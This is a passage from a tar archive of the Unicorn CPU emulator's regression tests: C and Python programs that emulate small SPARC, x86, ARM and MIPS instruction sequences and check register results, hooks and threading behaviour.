int EAX, ESP, val = 0x0c0c0c0c, stkval = STACK; EAX = 0; ESP = STACK+0x4; // Initialize emulator in X86-64bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if(err) { printf("Failed on uc_open() with error returned: %s\n", uc_strerror(err)); return 1; } err = uc_mem_map(uc, ADDRESS, SIZE, UC_PROT_ALL); if(err != UC_ERR_OK) { printf("Failed to map memory %s\n", uc_strerror(err)); return 1; } err = uc_mem_write(uc, ADDRESS, CODE32, sizeof(CODE32) - 1); if(err != UC_ERR_OK) { printf("Failed to write to memory %s\n", uc_strerror(err)); return 1; } loop: err = uc_mem_map(uc, stkval, STACK_SIZE, UC_PROT_ALL); if(err != UC_ERR_OK) { printf("Failed to map memory %s\n", uc_strerror(err)); return 1; } err = uc_mem_write(uc, ESP, &val, sizeof(val)); if(err != UC_ERR_OK) { printf("Failed to write to memory %s\n", uc_strerror(err)); return 1; } uc_hook_add(uc, &trace, UC_HOOK_MEM_WRITE | UC_HOOK_MEM_READ, (void *)hook_mem_rw, NULL, 1, 0); uc_reg_write(uc, UC_X86_REG_EAX, &EAX); uc_reg_write(uc, UC_X86_REG_ESP, &ESP); err = uc_emu_start(uc, ADDRESS, ADDRESS + (sizeof(CODE32) - 1), 0, 0); if(err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); uc_close(uc); return 1; } uc_reg_read(uc, UC_X86_REG_EAX, &EAX); printf(">>> EAX = %08X\n", EAX); if(stkval != STACK2) { printf("=== Beginning test two ===\n"); ESP = STACK2+0x4; EAX = 0; stkval = STACK2; goto loop; } uc_close(uc); return 0; } 
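/* Illustrative note, not part of the original test: UC_HOOK_MEM_READ and
 * UC_HOOK_MEM_WRITE callbacks fire on *valid* accesses and Unicorn ignores
 * their return value (the documented callback type returns void); only the
 * invalid-access hooks (UC_HOOK_MEM_*_UNMAPPED / *_PROT) use a bool result
 * to decide whether emulation continues. Declaring hook_mem_rw above as
 * returning bool is therefore harmless but not load-bearing. */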
��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/segfault_on_stop.py�����������������������������������������������������0000775�0000000�0000000�00000000472�14675241067�0021753�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python import regress import unicorn class SegfaultOnStop(regress.RegressTest): def test(self): unicorn.Uc(unicorn.UC_ARCH_X86, unicorn.UC_MODE_64).emu_stop() self.assertTrue(True, "If not reached, then we have a crashing bug.") if __name__ == '__main__': regress.main() ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/sigill.c����������������������������������������������������������������0000664�0000000�0000000�00000002276�14675241067�0017456�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> #include <stdio.h> #include <string.h> #include <stdlib.h> #define UC_BUG_WRITE_SIZE 128 #define UC_BUG_WRITE_ADDR 0x1000 // fix this by change this to 0x2000 int got_sigill = 0; void _interrupt(uc_engine *uc, uint32_t intno, void *user_data) { if (intno == 6) { uc_emu_stop(uc); got_sigill = 1; } } int main(void) { int size; uint8_t *buf; uc_engine *uc; uc_hook uh_trap; uc_err err = uc_open (UC_ARCH_X86, UC_MODE_64, &uc); if (err) { fprintf (stderr, "Cannot initialize unicorn\n"); return 1; } size = UC_BUG_WRITE_SIZE; buf = malloc (size); if (!buf) { fprintf (stderr, "Cannot allocate\n"); return 1; } memset (buf, 0, size); if (!uc_mem_map(uc, UC_BUG_WRITE_ADDR, size, UC_PROT_ALL)) { uc_mem_write(uc, UC_BUG_WRITE_ADDR, (const uint8_t*)"\xff\xff\xff\xff\xff\xff\xff\xff", 8); } uc_hook_add(uc, &uh_trap, UC_HOOK_INTR, _interrupt, NULL, 1, 0); uc_emu_start(uc, UC_BUG_WRITE_ADDR, UC_BUG_WRITE_ADDR+8, 0, 1); uc_close(uc); free(buf); printf ("Correct: %s\n", got_sigill? "YES": "NO"); return got_sigill? 
0: 1; } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/sigill2.c���������������������������������������������������������������0000664�0000000�0000000�00000001356�14675241067�0017536�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> #include <stdio.h> #include <string.h> #include <stdlib.h> #define UC_BUG_WRITE_SIZE 128 #define UC_BUG_WRITE_ADDR 0x2000 int main(void) { int size; uc_engine *uc; uc_err err = uc_open (UC_ARCH_X86, UC_MODE_64, &uc); if (err) { fprintf (stderr, "Cannot initialize unicorn\n"); return 1; } size = UC_BUG_WRITE_SIZE; if (!uc_mem_map (uc, UC_BUG_WRITE_ADDR, size, UC_PROT_ALL)) { uc_mem_write (uc, UC_BUG_WRITE_ADDR, (const uint8_t*)"\xff\xff\xff\xff\xff\xff\xff\xff", 8); } err = uc_emu_start(uc, UC_BUG_WRITE_ADDR, UC_BUG_WRITE_ADDR+8, 0, 1); uc_close(uc); printf ("Error = %u (%s)\n", err, uc_strerror(err)); return err? -1: 0; } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/sparc64.py��������������������������������������������������������������0000775�0000000�0000000�00000001057�14675241067�0017662�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python from unicorn import * from unicorn.sparc_const import * PAGE_SIZE = 1 * 1024 * 1024 uc = Uc(UC_ARCH_SPARC, UC_MODE_SPARC64|UC_MODE_BIG_ENDIAN) uc.reg_write(UC_SPARC_REG_SP, 100) print 'writing sp = 100' # 0: b0 06 20 01 inc %i0 # 4: b2 06 60 01 inc %i1 CODE = "\xb0\x06\x20\x01" \ "\xb2\x06\x60\x01" uc.mem_map(0, PAGE_SIZE) uc.mem_write(0, CODE) uc.emu_start(0, len(CODE), 0, 2) print 'sp =', uc.reg_read(UC_SPARC_REG_SP) print 'i0 =', uc.reg_read(UC_SPARC_REG_I0) print 'i1 =', uc.reg_read(UC_SPARC_REG_I1) 
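# (Illustrative note, not part of the original test: after the two "inc"
# instructions execute, the expected output is i0 == 1, i1 == 1, and sp
# still 100, since the code never touches %sp.)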
���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/sparc_jump_to_zero.c����������������������������������������������������0000664�0000000�0000000�00000001540�14675241067�0022070�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> #define HARDWARE_ARCHITECTURE UC_ARCH_SPARC #define HARDWARE_MODE UC_MODE_SPARC32|UC_MODE_BIG_ENDIAN #define MEMORY_STARTING_ADDRESS 0x1000000 #define MEMORY_SIZE 2 * 1024 * 1024 #define MEMORY_PERMISSIONS UC_PROT_ALL #define BINARY_CODE "\x02\xbc\x00\x00" int main(int argc, char **argv, char **envp) { uc_engine *uc; if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { printf("uc_open(…) failed\n"); return 1; } uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { printf("uc_mem_write(…) failed\n"); return 1; } printf("uc_emu_start(…)\n"); uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 20); printf("done\n"); return 0; } ����������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/sparc_reg.py������������������������������������������������������������0000775�0000000�0000000�00000015213�14675241067�0020344�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python from unicorn import * from unicorn.sparc_const import * PAGE_SIZE = 1 * 1024 * 1024 uc = Uc(UC_ARCH_SPARC, UC_MODE_SPARC32|UC_MODE_BIG_ENDIAN) uc.reg_write(UC_SPARC_REG_SP, 100) uc.reg_write(UC_SPARC_REG_FP, 200) # 0x0: \x80\x00\x20\x01 add %g0, 1, %g0 # 0x4: \x82\x00\x60\x01 add %g1, 1, %g1 # 0x8: \x84\x00\xA0\x01 add %g2, 1, %g2 # 0xc: \x86\x00\xE0\x01 add %g3, 1, %g3 # 0x10: \x88\x01\x20\x01 add %g4, 1, %g4 # 0x14: \x8A\x01\x60\x01 add %g5, 1, %g5 # 0x18: \x8C\x01\xA0\x01 add %g6, 1, %g6 # 0x1c: \x8E\x01\xE0\x01 add %g7, 1, %g7 # 0x20: \x90\x02\x20\x01 add %o0, 1, %o0 # 0x24: \x92\x02\x60\x01 add %o1, 1, %o1 # 0x28: \x94\x02\xA0\x01 add %o2, 1, %o2 # 0x2c: \x96\x02\xE0\x01 add %o3, 1, %o3 # 0x30: \x98\x03\x20\x01 add %o4, 1, %o4 # 0x34: \x9A\x03\x60\x01 add %o5, 1, %o5 # 0x38: \x9C\x03\xA0\x01 add %sp, 1, %sp # 0x3c: \x9E\x03\xE0\x01 add %o7, 1, %o7 # 0x40: \xA0\x04\x20\x01 add %l0, 1, %l0 # 0x44: \xA2\x04\x60\x01 add %l1, 1, %l1 # 0x48: \xA4\x04\xA0\x01 add %l2, 1, %l2 # 0x4c: \xA6\x04\xE0\x01 add %l3, 1, %l3 # 0x50: \xA8\x05\x20\x01 add %l4, 1, %l4 
# 0x54: \xAA\x05\x60\x01 add %l5, 1, %l5 # 0x58: \xAC\x05\xA0\x01 add %l6, 1, %l6 # 0x5c: \xAE\x05\xE0\x01 add %l7, 1, %l7 # 0x0: \xB0\x06\x20\x01 add %i0, 1, %i0 # 0x4: \xB2\x06\x60\x01 add %i1, 1, %i1 # 0x8: \xB4\x06\xA0\x01 add %i2, 1, %i2 # 0xc: \xB6\x06\xE0\x01 add %i3, 1, %i3 # 0x10: \xB8\x07\x20\x01 add %i4, 1, %i4 # 0x14: \xBA\x07\x60\x01 add %i5, 1, %i5 # 0x18: \xBC\x07\xA0\x01 add %fp, 1, %fp # 0x1c: \xBE\x07\xE0\x01 add %i7, 1, %i7 CODE = "\x80\x00\x20\x01" \ "\x82\x00\x60\x01" \ "\x84\x00\xA0\x01" \ "\x86\x00\xE0\x01" \ "\x88\x01\x20\x01" \ "\x8A\x01\x60\x01" \ "\x8C\x01\xA0\x01" \ "\x8E\x01\xE0\x01" \ "\x90\x02\x20\x01" \ "\x92\x02\x60\x01" \ "\x94\x02\xA0\x01" \ "\x96\x02\xE0\x01" \ "\x98\x03\x20\x01" \ "\x9A\x03\x60\x01" \ "\x9C\x03\xA0\x01" \ "\x9E\x03\xE0\x01" \ "\xA0\x04\x20\x01" \ "\xA2\x04\x60\x01" \ "\xA4\x04\xA0\x01" \ "\xA6\x04\xE0\x01" \ "\xA8\x05\x20\x01" \ "\xAA\x05\x60\x01" \ "\xAC\x05\xA0\x01" \ "\xAE\x05\xE0\x01" \ "\xB0\x06\x20\x01" \ "\xB2\x06\x60\x01" \ "\xB4\x06\xA0\x01" \ "\xB6\x06\xE0\x01" \ "\xB8\x07\x20\x01" \ "\xBA\x07\x60\x01" \ "\xBC\x07\xA0\x01" \ "\xBE\x07\xE0\x01" uc.mem_map(0, PAGE_SIZE) uc.mem_write(0, CODE) uc.emu_start(0, len(CODE), 0, 32) def print_registers(mu): g0 = mu.reg_read(UC_SPARC_REG_G0) g1 = mu.reg_read(UC_SPARC_REG_G1) g2 = mu.reg_read(UC_SPARC_REG_G2) g3 = mu.reg_read(UC_SPARC_REG_G3) g4 = mu.reg_read(UC_SPARC_REG_G4) g5 = mu.reg_read(UC_SPARC_REG_G5) g6 = mu.reg_read(UC_SPARC_REG_G6) g7 = mu.reg_read(UC_SPARC_REG_G7) o0 = mu.reg_read(UC_SPARC_REG_O0) o1 = mu.reg_read(UC_SPARC_REG_O1) o2 = mu.reg_read(UC_SPARC_REG_O2) o3 = mu.reg_read(UC_SPARC_REG_O3) o4 = mu.reg_read(UC_SPARC_REG_O4) o5 = mu.reg_read(UC_SPARC_REG_O5) o6 = mu.reg_read(UC_SPARC_REG_O6) o7 = mu.reg_read(UC_SPARC_REG_O7) l0 = mu.reg_read(UC_SPARC_REG_L0) l1 = mu.reg_read(UC_SPARC_REG_L1) l2 = mu.reg_read(UC_SPARC_REG_L2) l3 = mu.reg_read(UC_SPARC_REG_L3) l4 = mu.reg_read(UC_SPARC_REG_L4) l5 = mu.reg_read(UC_SPARC_REG_L5) l6 = mu.reg_read(UC_SPARC_REG_L6) l7 = mu.reg_read(UC_SPARC_REG_L7) i0 = mu.reg_read(UC_SPARC_REG_I0) i1 = mu.reg_read(UC_SPARC_REG_I1) i2 = mu.reg_read(UC_SPARC_REG_I2) i3 = mu.reg_read(UC_SPARC_REG_I3) i4 = mu.reg_read(UC_SPARC_REG_I4) i5 = mu.reg_read(UC_SPARC_REG_I5) i6 = mu.reg_read(UC_SPARC_REG_I6) i7 = mu.reg_read(UC_SPARC_REG_I7) pc = mu.reg_read(UC_SPARC_REG_PC) sp = mu.reg_read(UC_SPARC_REG_SP) fp = mu.reg_read(UC_SPARC_REG_FP) print(" G0 = %d" % g0) print(" G1 = %d" % g1) print(" G2 = %d" % g2) print(" G3 = %d" % g3) print(" G4 = %d" % g4) print(" G5 = %d" % g5) print(" G6 = %d" % g6) print(" G7 = %d" % g7) print("") print(" O0 = %d" % o0) print(" O1 = %d" % o1) print(" O2 = %d" % o2) print(" O3 = %d" % o3) print(" O4 = %d" % o4) print(" O5 = %d" % o5) print(" O6 = %d" % o6) print(" O7 = %d" % o7) print("") print(" L0 = %d" % l0) print(" L1 = %d" % l1) print(" L2 = %d" % l2) print(" L3 = %d" % l3) print(" L4 = %d" % l4) print(" L5 = %d" % l5) print(" L6 = %d" % l6) print(" L7 = %d" % l7) print("") print(" I0 = %d" % i0) print(" I1 = %d" % i1) print(" I2 = %d" % i2) print(" I3 = %d" % i3) print(" I4 = %d" % i4) print(" I5 = %d" % i5) print(" I6 = %d" % i6) print(" I7 = %d" % i7) print("") print(" PC = %d" % pc) print(" SP = %d" % sp) print(" FP = %d" % fp) print("") print_registers(uc) assert uc.reg_read(UC_SPARC_REG_PC) == 132 # make sure we executed all instructions assert uc.reg_read(UC_SPARC_REG_SP) == 101 assert uc.reg_read(UC_SPARC_REG_FP) == 201 assert uc.reg_read(UC_SPARC_REG_G0) == 0 # G0 is always zero assert 
uc.reg_read(UC_SPARC_REG_G1) == 1
assert uc.reg_read(UC_SPARC_REG_G2) == 1
assert uc.reg_read(UC_SPARC_REG_G3) == 1
assert uc.reg_read(UC_SPARC_REG_G4) == 1
assert uc.reg_read(UC_SPARC_REG_G5) == 1
assert uc.reg_read(UC_SPARC_REG_G6) == 1
assert uc.reg_read(UC_SPARC_REG_G7) == 1

assert uc.reg_read(UC_SPARC_REG_O0) == 1
assert uc.reg_read(UC_SPARC_REG_O1) == 1
assert uc.reg_read(UC_SPARC_REG_O2) == 1
assert uc.reg_read(UC_SPARC_REG_O3) == 1
assert uc.reg_read(UC_SPARC_REG_O4) == 1
assert uc.reg_read(UC_SPARC_REG_O5) == 1
assert uc.reg_read(UC_SPARC_REG_O6) == 101
assert uc.reg_read(UC_SPARC_REG_O7) == 1

assert uc.reg_read(UC_SPARC_REG_L0) == 1
assert uc.reg_read(UC_SPARC_REG_L1) == 1
assert uc.reg_read(UC_SPARC_REG_L2) == 1
assert uc.reg_read(UC_SPARC_REG_L3) == 1
assert uc.reg_read(UC_SPARC_REG_L4) == 1
assert uc.reg_read(UC_SPARC_REG_L5) == 1
assert uc.reg_read(UC_SPARC_REG_L6) == 1
assert uc.reg_read(UC_SPARC_REG_L7) == 1

assert uc.reg_read(UC_SPARC_REG_I0) == 1
assert uc.reg_read(UC_SPARC_REG_I1) == 1
assert uc.reg_read(UC_SPARC_REG_I2) == 1
assert uc.reg_read(UC_SPARC_REG_I3) == 1
assert uc.reg_read(UC_SPARC_REG_I4) == 1
assert uc.reg_read(UC_SPARC_REG_I5) == 1
assert uc.reg_read(UC_SPARC_REG_I6) == 201
assert uc.reg_read(UC_SPARC_REG_I7) == 1
unicorn-2.1.1/tests/regress/sysenter_hook_x86.c
#include <unicorn/unicorn.h>

// code to be emulated
#define X86_CODE32 "\x0F\x34" // SYSENTER

// memory address where emulation starts
#define ADDRESS 0x1000000

int got_sysenter = 0;

void sysenter (uc_engine *uc, void *user)
{
    printf ("SYSENTER hook called.\n");
    got_sysenter = 1;
}

int main(int argc, char **argv, char **envp)
{
    uc_engine *uc;
    uc_err err;
    uc_hook sysenterHook;

    // Initialize emulator in X86-32bit mode
    err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc);
    if (err != UC_ERR_OK) {
        printf("Failed on uc_open() with error returned: %u\n", err);
        return -1;
    }

    // map 2MB memory for this emulation
    uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL);

    // write machine code to be emulated to memory
    if (uc_mem_write(uc, ADDRESS, X86_CODE32, sizeof(X86_CODE32) - 1)) {
        printf("Failed to write emulation code to memory, quit!\n");
        return -1;
    }

    // Hook the SYSENTER instructions
    if (uc_hook_add (uc, &sysenterHook, UC_HOOK_INSN, sysenter, NULL, 1, 0, UC_X86_INS_SYSENTER) != UC_ERR_OK) {
        printf ("Cannot hook SYSENTER instruction.\n");
        return -1;
    }

    // emulate code in infinite time & unlimited instructions
    err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32) - 1, 0, 0);
    if (err) {
        printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err));
    }

    printf("Emulation done.\n");

    uc_close(uc);

    if (!got_sysenter) {
        printf ("[!]
ERROR : SYSENTER hook not called.\n"); return -1; } return 0; } unicorn-2.1.1/tests/regress/tcg_liveness_analysis_bug_issue-287.py����������������������������������0000775�0000000�0000000�00000014571�14675241067�0025360�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from unicorn import * from unicorn.arm_const import * import binascii MB = 1024 * 1024 PAGE = 4 * 1024 def PrintArmRegisters(uc_emu): print 'R0 : '+hex(uc_emu.reg_read(UC_ARM_REG_R0)) print 'R1 : '+hex(uc_emu.reg_read(UC_ARM_REG_R1)) print 'R2 : '+hex(uc_emu.reg_read(UC_ARM_REG_R2)) print 'R3 : '+hex(uc_emu.reg_read(UC_ARM_REG_R3)) print 'R4 : '+hex(uc_emu.reg_read(UC_ARM_REG_R4)) print 'R5 : '+hex(uc_emu.reg_read(UC_ARM_REG_R5)) print 'R6 : '+hex(uc_emu.reg_read(UC_ARM_REG_R6)) print 'R7 : '+hex(uc_emu.reg_read(UC_ARM_REG_R7)) print 'R8 : '+hex(uc_emu.reg_read(UC_ARM_REG_R8)) print 'R9 : '+hex(uc_emu.reg_read(UC_ARM_REG_R9)) print 'R10 : '+hex(uc_emu.reg_read(UC_ARM_REG_R10)) print 'R11 : '+hex(uc_emu.reg_read(UC_ARM_REG_R11)) print 'R12 : '+hex(uc_emu.reg_read(UC_ARM_REG_R12)) print 'SP : '+hex(uc_emu.reg_read(UC_ARM_REG_SP)) print 'LR : '+hex(uc_emu.reg_read(UC_ARM_REG_LR)) print 'PC : '+hex(uc_emu.reg_read(UC_ARM_REG_PC)) flags = uc_emu.reg_read(UC_ARM_REG_CPSR) print 'carry : '+str(flags >> 29 & 0x1) print 'overflow : '+str(flags >> 28 & 0x1) print 'negative : '+str(flags >> 31 & 0x1) print 'zero : '+str(flags >> 30 & 0x1) ''' issue #287 Initial Register States: R0=3, R1=24, R2=16, R3=0 ----- code start ----- CMP R0,R1,LSR#3 SUBCS R0,R0,R1,LSR#3 # CPU flags got changed in these two instructions, and *REMEMBERED*, now NF == VF == 0 CMP R0,#1 # CPU flags changed again, now NF == 1, VF == 0, but they are not properly *REMEMBERED* MOV R1,R1,LSR#4 SUBGES R2,R2,#4 # according to the result of CMP, we should skip this op MOVGE R3,#100 # since changed flags are not *REMEMBERED* in CMP, now NF == VF == 0, which result in wrong branch # at the end of this code block, should R3 == 0 ----- code end ------ # TCG ops are correct, plain op translation is done correctly, # but there're In-Memory bits invisible from ops that control the host code generation. # all these codes are in one TCG translation-block, so wrong things could happen. # detail explanation is given on the right side. # remember, both set_label and brcond are point to refresh the dead_temps and mem_temps states in TCG ----- TCG ops ------ ld_i32 tmp5,env,$0xfffffffffffffff4 movi_i32 tmp6,$0x0 brcond_i32 tmp5,tmp6,ne,$0x0 mov_i32 tmp5,r1 ------------------------- movi_i32 tmp6,$0x3 | shr_i32 tmp5,r1,tmp6 | mov_i32 tmp6,r0 | sub_i32 NF,r0,tmp5 | mov_i32 ZF,NF | setcond_i32 CF,r0,tmp5,geu | # This part is "CMP R0,R1,LSR#3" xor_i32 VF,NF,r0 |-----> # and "SUBCS R0,R0,R1,LSR#3" xor_i32 tmp7,r0,tmp5 | # the last op in this block, set_label get a chance to refresh the TCG globals memory states, and_i32 VF,VF,tmp7 | # so things get back to normal states mov_i32 tmp6,NF | # these codes are not affected by the bug. 
Let's called this Part-D movi_i32 tmp5,$0x0 | brcond_i32 CF,tmp5,eq,$0x1 | mov_i32 tmp5,r1 | movi_i32 tmp6,$0x3 | shr_i32 tmp5,r1,tmp6 | mov_i32 tmp6,r0 | sub_i32 tmp6,r0,tmp5 | mov_i32 r0,tmp6 | set_label $0x1 ------------------------- movi_i32 tmp5,$0x1 ----------------- # Let's called this Part-C mov_i32 tmp6,r0 | # NF is used as output operand again! sub_i32 NF,r0,tmp5 ----------------|-----> # but it is stated as Not-In-Memory, mov_i32 ZF,NF | # no need to sync it after calculation. setcond_i32 CF,r0,tmp5,geu | # the generated host code does not write NF xor_i32 VF,NF,r0 | # back to its memory location, hence forgot. And the CPU flags after this calculation is not changed. xor_i32 tmp7,r0,tmp5 | # Caution: the following SUBGES's condition check is right, even though the generated host code does not *REMEMBER* NF, it will cache the calculated result and serve SUBGES correctly and_i32 VF,VF,tmp7 | mov_i32 tmp6,NF | mov_i32 tmp5,r1 | # this part is "CMP R0,#1" movi_i32 tmp6,$0x4 | # and "MOV R1,R1,LSR#4" shr_i32 tmp5,r1,tmp6 | # and "SUBGES R2,R2,#4" mov_i32 r1,tmp5 |-----> # This is the part where problem start to arise xor_i32 tmp5,VF,NF | movi_i32 tmp6,$0x0 | brcond_i32 tmp5,tmp6,lt,$0x2 --------|-----> # QEMU will refresh the InMemory bit for TCG globals here, but Unicorn won't movi_i32 tmp5,$0x4 | mov_i32 tmp6,r2 | # this is the 1st bug-related op get analyzed. sub_i32 NF,r2,tmp5 ----------------|-----> # here, NF is an output operand, it's flagged dead mov_i32 ZF,NF | # and the InMemory bit is clear, tell the previous(above) ops setcond_i32 CF,r2,tmp5,geu | # if it is used as output operand again, do not sync it xor_i32 VF,NF,r2 | # so the generated host-code for previous ops will not write it back to Memory xor_i32 tmp7,r2,tmp5 | # Caution: the CPU flags after this calculation is also right, because the set_label is a point of refresh, make them *REMEMBERED* and_i32 VF,VF,tmp7 | # Let's call this Part-B mov_i32 tmp6,NF | mov_i32 r2,ZF | set_label $0x2 ----------------- xor_i32 tmp5,VF,NF ----------------- movi_i32 tmp6,$0x0 | brcond_i32 tmp5,tmp6,lt,$0x3 | # Let's call this Part-A movi_i32 tmp5,$0x64 | # if Part-B is not skipped, this part won't go wrong, because we'll check the CPU flags as the result of Part-B, it's *REMEMBERED* movi_i32 r3,$0x64 |-----> # but if Part-B is skipped, set_label $0x3 | # what should we expected? we will check the condition based on the result of Part-D!!! call wfi,$0x0,$0,env | # because result of Part-C is lost. this is why things go wrong. 
set_label $0x0 | exit_tb $0x7f6401714013 ----------------- ########### ----- TCG ends ------ ''' TestCode = b'\xa1\x01\x50\xe1\xa1\x01\x40\x20\x01\x00\x50\xe3\x21\x12\xa0\xe1\x04\x20\x52\xa2\x64\x30\xa0\xa3' def UseUcToEmulate(): try: uc_emu = Uc(UC_ARCH_ARM, UC_MODE_ARM) #if LoadCode(uc_emu, 2*MB, 0x9004): uc_emu.mem_map(0, 2*MB) uc_emu.reg_write(UC_ARM_REG_SP, 0x40000) uc_emu.reg_write(UC_ARM_REG_R0, 3) uc_emu.reg_write(UC_ARM_REG_R1, 24) uc_emu.reg_write(UC_ARM_REG_R2, 16) uc_emu.mem_write(0, TestCode) uc_emu.emu_start(0, 24) PrintArmRegisters(uc_emu) except UcError as e: print("ERROR: %s" % e) PrintArmRegisters(uc_emu) UseUcToEmulate() ���������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/threaded_emu_start.c����������������������������������������������������0000664�0000000�0000000�00000013466�14675241067�0022041�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Test for uc_open() and uc_emu_start() being called by different threads. This code will call uc_open() in the main thread and then attempt to call uc_emu_start() from its own thread. This would enable the emulator to run in the background while you do other things like handle user interface etc in the foreground. Currently "uc->qemu_global_mutex" is locked by uc_open() and unlocked by uc_emu_start(). This is a problem because the mutex implementation must be locked and unlocked by the same thread. This means that uc_open() and uc_emu_start() must be executed in the same thread. This is an unnecessary limitation which prevents the emulator from being able to be executed in the background. */ // windows specific #ifdef _MSC_VER #include <io.h> #include <windows.h> #include <process.h> #define PRIx64 "llX" #include <unicorn/unicorn.h> #ifdef _WIN64 #pragma comment(lib, "unicorn_staload64.lib") #else // _WIN64 #pragma comment(lib, "unicorn_staload.lib") #endif // _WIN64 // posix specific #else // _MSC_VER #include <unicorn/unicorn.h> #include "pthread.h" #endif // _MSC_VER // for win32 threads in mingw #ifdef _WIN32 #include <windows.h> #endif // common includes #include <string.h> // Test MIPS little endian code. // This should loop forever. const uint64_t addr = 0x100000; const unsigned char loop_test_code[] = { 0x02,0x00,0x04,0x24, // 100000: li $a0, 2 // loop1 0x00,0x00,0x00,0x00, // 100004: nop 0xFE,0xFF,0x80,0x14, // 100008: bnez $a0, loop1 0x00,0x00,0x00,0x00, // 10000C: nop }; bool test_passed_ok = false; int loop_count = 0; // This hook is used to show that code is executing in the emulator. static void mips_codehook(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf("Code: %"PRIx64"\n", address); } typedef struct { uc_engine *uc; uint64_t startAddr; uint64_t endAddr; } EmuStarterParam_t; // This is a thread that just runs uc_emu_start() in it. // The code that it is executing in this case will run forever until it is stopped by uc_emu_stop(). 
static uc_err emu_starter(void* param)
{
    uc_engine *uc;
    uint64_t start_addr;
    uint64_t end_addr;
    uc_err err;

    EmuStarterParam_t* starter_params = (EmuStarterParam_t *)param;
    uc = starter_params->uc;
    start_addr = starter_params->startAddr;
    end_addr = starter_params->endAddr;

    printf("uc_emu_start()\n");
    err = uc_emu_start(uc, start_addr, end_addr, 0, 0);
    if (err) {
        printf("Failed on uc_emu_start() with error returned %u: %s\n",
                err, uc_strerror(err));
    }

    return err;
}

#ifdef _WIN32
static unsigned int __stdcall win32_emu_starter(void* param)
{
    uc_err err = emu_starter(param);
    _endthreadex(err);
    return err;
}
#else
static void* posix_emu_starter(void* param)
{
    uc_err err = emu_starter(param);
    return (void*)err;
}
#endif

int main(int argc, char **argv, char **envp)
{
    uc_engine *uc;
    uc_err err;
    int ret;
    uc_hook hhc;
    uint32_t val;
    EmuStarterParam_t starter_params;
#ifdef _WIN32
    HANDLE th = (HANDLE)-1;
#else
    pthread_t th;
#endif

    // Initialize emulator in MIPS 32bit little endian mode
    printf("uc_open()\n");
    err = uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32, &uc);
    if (err) {
        printf("Failed on uc_open() with error returned: %u\n", err);
        return err;
    }

    // map in a page of mem
    printf("uc_mem_map()\n");
    err = uc_mem_map(uc, addr, 0x1000, UC_PROT_ALL);
    if (err) {
        printf("Failed on uc_mem_map() with error returned: %u\n", err);
        return err;
    }

    // write machine code to be emulated to memory
    printf("uc_mem_write()\n");
    err = uc_mem_write(uc, addr, loop_test_code, sizeof(loop_test_code));
    if (err) {
        printf("Failed on uc_mem_write() with error returned: %u\n", err);
        return err;
    }

    // hook all instructions by having @begin > @end
    printf("uc_hook_add()\n");
    // note: the original test dropped this return value and then tested a
    // stale err; the result of uc_hook_add() must be assigned before checking
    err = uc_hook_add(uc, &hhc, UC_HOOK_CODE, mips_codehook, NULL, 1, 0);
    if (err) {
        printf("Failed on uc_hook_add(code) with error returned: %u\n", err);
        return err;
    }

    // start background thread
    printf("---- Thread Starting ----\n");
    starter_params.uc = uc;
    starter_params.startAddr = addr;
    starter_params.endAddr = addr + sizeof(loop_test_code);

#ifdef _WIN32
    // create thread; _beginthreadex() returns 0 (not -1) on failure
    th = (HANDLE)_beginthreadex(NULL, 0, win32_emu_starter, &starter_params,
            CREATE_SUSPENDED, NULL);
    if (th == NULL) {
        printf("Failed on _beginthreadex() with error returned: %p\n", _errno());
        return -1;
    }

    // start thread
    ret = ResumeThread(th);
    if (ret == -1) {
        printf("Failed on ResumeThread() with error returned: %p\n", _errno());
        return -2;
    }

    // wait 3 seconds
    Sleep(3 * 1000);
#else
    // start the emu_starter() thread
